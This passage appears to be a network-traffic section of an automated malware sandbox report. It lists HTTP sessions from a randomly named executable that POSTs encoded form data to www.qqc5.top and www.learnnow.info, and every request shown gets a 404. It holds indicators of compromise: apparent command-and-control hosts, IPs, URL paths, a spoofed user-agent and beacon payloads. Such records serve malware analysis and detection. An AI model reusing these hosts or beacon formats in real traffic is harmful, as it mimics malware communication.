                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.84973438.47.233.4806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:16.413953066 CET695OUTPOST /fqrq/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.qqc5.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.qqc5.top
                                                                                Referer: http://www.qqc5.top/fqrq/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 56 32 30 6e 56 75 75 4e 66 35 53 41 73 31 4a 69 69 38 6b 72 4b 37 4d 61 62 39 72 2b 61 55 54 6f 2b 79 63 64 7a 53 33 75 44 6d 46 30 79 49 78 6c 6d 6d 63 35 54 5a 56 4a 4d 44 69 63 47 6b 78 32 32 6a 33 54 55 4d 49 2b 50 69 4e 43 7a 75 6a 68 44 30 63 33 6b 63 55 71 31 37 59 74 7a 73 67 37 58 30 76 4e 52 53 75 50 2b 61 73 48 68 75 55 37 71 39 78 57 75 39 63 6b 6d 36 49 63 4e 31 36 6f 2b 36 4d 42 76 58 59 69 56 59 45 64 6e 75 79 67 51 51 37 70 51 30 64 59 42 67 4c 50 68 63 2b 73 54 56 76 4d 74 45 48 6a 69 56 49 75 6e 54 34 78 39 33 56 30 77 64 78 47 6b 62 71 46 4e 49 54 58 4c 50 6a 4a 4d 69 51 3d
                                                                                Data Ascii: ynlT=V20nVuuNf5SAs1Jii8krK7Mab9r+aUTo+ycdzS3uDmF0yIxlmmc5TZVJMDicGkx22j3TUMI+PiNCzujhD0c3kcUq17Ytzsg7X0vNRSuP+asHhuU7q9xWu9ckm6IcN16o+6MBvXYiVYEdnuygQQ7pQ0dYBgLPhc+sTVvMtEHjiVIunT4x93V0wdxGkbqFNITXLPjJMiQ=
                                                                                Nov 26, 2024 09:29:18.035614967 CET691INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:29:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.84973538.47.233.4806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:19.234749079 CET715OUTPOST /fqrq/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.qqc5.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.qqc5.top
                                                                                Referer: http://www.qqc5.top/fqrq/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 56 32 30 6e 56 75 75 4e 66 35 53 41 32 55 35 69 75 37 77 72 4e 62 4d 5a 59 39 72 2b 54 30 53 76 2b 31 55 64 7a 54 6a 2b 44 77 74 30 78 71 35 6c 67 58 63 35 53 5a 56 4a 44 6a 69 64 49 45 78 4c 32 6a 37 74 55 4d 30 2b 50 69 4a 43 7a 72 66 68 43 48 45 30 6c 4d 55 73 34 62 59 76 75 38 67 37 58 30 76 4e 52 53 36 70 2b 61 30 48 68 2b 45 37 72 63 78 56 74 39 63 6e 68 36 49 63 62 31 36 6b 2b 36 4d 6a 76 57 30 45 56 61 4d 64 6e 74 6d 67 51 69 54 71 4c 6b 64 61 63 51 4b 44 78 4a 44 32 4c 69 6e 75 70 43 48 36 67 6e 45 6c 72 46 4a 62 6e 56 64 79 7a 64 5a 74 6b 59 43 7a 49 2f 4f 2f 52 73 7a 35 53 31 46 61 6a 6d 41 38 73 45 70 77 72 34 56 6d 37 54 48 47 47 6b 56 57
                                                                                Data Ascii: ynlT=V20nVuuNf5SA2U5iu7wrNbMZY9r+T0Sv+1UdzTj+Dwt0xq5lgXc5SZVJDjidIExL2j7tUM0+PiJCzrfhCHE0lMUs4bYvu8g7X0vNRS6p+a0Hh+E7rcxVt9cnh6Icb16k+6MjvW0EVaMdntmgQiTqLkdacQKDxJD2LinupCH6gnElrFJbnVdyzdZtkYCzI/O/Rsz5S1FajmA8sEpwr4Vm7THGGkVW
                                                                                Nov 26, 2024 09:29:20.664648056 CET691INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:29:20 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.84973638.47.233.4806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:22.082773924 CET1732OUTPOST /fqrq/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.qqc5.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.qqc5.top
                                                                                Referer: http://www.qqc5.top/fqrq/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 56 32 30 6e 56 75 75 4e 66 35 53 41 32 55 35 69 75 37 77 72 4e 62 4d 5a 59 39 72 2b 54 30 53 76 2b 31 55 64 7a 54 6a 2b 44 77 56 30 79 66 74 6c 6a 30 45 35 44 70 56 4a 64 7a 69 51 49 45 78 61 32 6a 7a 70 55 4d 34 45 50 67 42 43 38 70 6e 68 46 32 45 30 76 4d 55 73 78 37 59 73 7a 73 67 75 58 30 2f 7a 52 52 43 70 2b 61 30 48 68 34 41 37 73 4e 78 56 68 64 63 6b 6d 36 4a 64 4e 31 37 7a 2b 38 6c 63 76 57 41 79 57 71 73 64 6d 4c 47 67 44 6d 7a 71 48 6b 64 63 66 51 4c 65 78 4a 47 6f 4c 69 54 49 70 43 62 41 67 6c 55 6c 6f 68 6b 6e 79 33 31 6b 6b 2b 39 35 76 36 6d 75 4f 4d 47 48 63 2b 69 4d 52 6b 39 59 6f 52 67 42 6e 45 6c 65 6a 2f 63 70 74 53 2f 75 4c 79 6f 70 4a 45 38 45 42 6d 4d 67 39 72 65 38 78 6e 42 39 4f 76 7a 76 6c 2b 31 50 47 46 77 6c 75 52 58 57 2f 4d 67 42 33 71 34 74 58 50 67 4d 77 45 2b 37 6e 4e 6a 37 33 49 70 42 73 57 65 63 7a 56 39 4c 38 48 6e 63 62 56 48 55 6d 57 56 6e 65 33 6f 39 69 43 79 51 44 69 64 79 79 70 46 37 36 77 43 50 79 2b 70 4e 57 43 32 6a 4b 2f 66 75 69 65 4e 4e 48 [TRUNCATED]
                                                                                Data Ascii: ynlT=V20nVuuNf5SA2U5iu7wrNbMZY9r+T0Sv+1UdzTj+DwV0yftlj0E5DpVJdziQIExa2jzpUM4EPgBC8pnhF2E0vMUsx7YszsguX0/zRRCp+a0Hh4A7sNxVhdckm6JdN17z+8lcvWAyWqsdmLGgDmzqHkdcfQLexJGoLiTIpCbAglUlohkny31kk+95v6muOMGHc+iMRk9YoRgBnElej/cptS/uLyopJE8EBmMg9re8xnB9Ovzvl+1PGFwluRXW/MgB3q4tXPgMwE+7nNj73IpBsWeczV9L8HncbVHUmWVne3o9iCyQDidyypF76wCPy+pNWC2jK/fuieNNHH4CsajPFfWagcwcG0MEadYwkqmId4bbpMmAeH5EPf30JK27SkJhJWOM/yLgRuFlhX81PmtPzRuB9b1FZFlzivKAyV05bD9FD9XZ6UziqA6jy/Sejf/n9TTYQIMacG9kxu9NOV3J2TPA+BllUbYgrsfRDXHJCop8ts9V1RH66wtWvalDExVV1XbPI1Cl8U9qNmshfaRzcsqrnoopcL83DLQ2486Jw9VcO/br5JUzp8CeTSO3zV/pDY8kxVYXkBEW0mJOXOedXnbvzfIoK4DJwnQYcs/AC3zWPdak7EvVqZYjxy9dgVz8yKS1p90/Ru4QsFpmAQnQtRMIOTdy4rGI7nzZOdbBMNRQrG00bTtLxqMDx+pPRL5GkInKISJeA3ClyB4pfZ+j5BZ4cYLDsHhLoTqtWKn657+ClBqxQeDG87iM+cmHX6CXHi79iMA/80bulOyilUQ14/1uJDjZKieda+lq5+p5ouIF66WhKZ6jXVCr1YL1G+rSLhngL+6hESXu4QJ0S50EpLUmLxpXvhZM/0O/yziyweEqGQ0DkjmFlJb+nTs1yy6IydkaPVQAnj2oPqRBeIohQm0vZBABINNiibEj+3jybfGirkM2xxHPWR3xI6YK7JcaTXnfoDt+7e/vMRFUAlURWxYOqHNADk6YR7YUH6DB2eiWyLW [TRUNCATED]
                                                                                Nov 26, 2024 09:29:23.582566977 CET691INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:29:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.84973738.47.233.4806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:24.750760078 CET448OUTGET /fqrq/?ynlT=Y0cHWYGzbrmggkpYjpxtSdMxfMP0Smiz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh8s29K102qUBTE3lZDmg/9I7wbokssp0voIrvrAUc2Osrw==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.qqc5.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:29:26.297172070 CET691INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:29:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.849738199.192.23.123806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:31.949333906 CET710OUTPOST /6npp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.learnnow.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.learnnow.info
                                                                                Referer: http://www.learnnow.info/6npp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 75 6e 4f 64 74 36 68 67 36 62 34 36 4d 46 70 38 65 73 46 47 52 76 69 51 4c 55 4f 44 4f 73 6d 70 54 42 54 39 57 7a 57 74 6a 46 78 39 52 43 51 37 46 79 44 7a 6d 66 7a 44 32 2f 75 4c 2b 71 35 63 54 5a 71 69 4b 71 64 4c 6b 39 37 70 50 74 36 66 65 6a 2f 30 70 47 36 62 77 6e 33 64 6f 2b 66 38 57 31 2f 42 51 7a 37 70 57 57 6a 63 32 76 66 34 6e 2b 4d 65 6d 34 59 4d 48 47 64 2f 6d 4e 2f 4e 52 6f 4a 31 49 71 71 32 31 32 49 63 55 6b 57 77 6b 78 6d 43 64 44 49 46 78 53 73 4f 7a 49 7a 76 35 57 51 4e 56 6a 7a 51 54 34 33 76 51 42 44 4f 4e 37 7a 6d 50 37 4d 61 62 34 68 6d 6e 72 4f 37 41 32 49 35 51 32 6b 3d
                                                                                Data Ascii: ynlT=unOdt6hg6b46MFp8esFGRviQLUODOsmpTBT9WzWtjFx9RCQ7FyDzmfzD2/uL+q5cTZqiKqdLk97pPt6fej/0pG6bwn3do+f8W1/BQz7pWWjc2vf4n+Mem4YMHGd/mN/NRoJ1Iqq212IcUkWwkxmCdDIFxSsOzIzv5WQNVjzQT43vQBDON7zmP7Mab4hmnrO7A2I5Q2k=
                                                                                Nov 26, 2024 09:29:33.212165117 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:29:32 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.849739199.192.23.123806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:34.629225969 CET730OUTPOST /6npp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.learnnow.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.learnnow.info
                                                                                Referer: http://www.learnnow.info/6npp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 75 6e 4f 64 74 36 68 67 36 62 34 36 4e 6b 35 38 4e 64 46 47 47 66 69 54 42 30 4f 44 62 63 6d 79 54 42 50 39 57 79 53 39 2f 6e 6c 39 55 57 63 37 4b 54 44 7a 6c 66 7a 44 76 50 75 4f 77 4b 35 4c 54 5a 57 41 4b 72 68 4c 6b 39 48 70 50 73 4b 66 65 79 2f 33 37 6d 36 46 37 48 33 66 31 4f 66 38 57 31 2f 42 51 7a 75 68 57 53 48 63 32 65 50 34 6d 62 34 64 34 6f 59 50 58 57 64 2f 69 4e 2f 4a 52 6f 4a 48 49 6f 66 54 31 77 45 63 55 6d 2b 77 6b 67 6d 4e 55 44 49 4c 2f 79 74 65 6a 64 71 61 78 30 59 33 58 79 66 73 51 4a 75 51 56 33 79 6b 58 5a 37 67 4d 37 6b 78 62 37 4a 51 69 63 54 54 61 56 59 4a 4f 68 78 2f 58 74 67 71 2b 70 39 56 78 42 77 71 37 38 33 64 71 4f 31 65
                                                                                Data Ascii: ynlT=unOdt6hg6b46Nk58NdFGGfiTB0ODbcmyTBP9WyS9/nl9UWc7KTDzlfzDvPuOwK5LTZWAKrhLk9HpPsKfey/37m6F7H3f1Of8W1/BQzuhWSHc2eP4mb4d4oYPXWd/iN/JRoJHIofT1wEcUm+wkgmNUDIL/ytejdqax0Y3XyfsQJuQV3ykXZ7gM7kxb7JQicTTaVYJOhx/Xtgq+p9VxBwq783dqO1e
                                                                                Nov 26, 2024 09:29:35.890691042 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:29:35 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.849740199.192.23.123806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:37.297075987 CET1747OUTPOST /6npp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.learnnow.info
                                                                                Cache-Control: no-cache
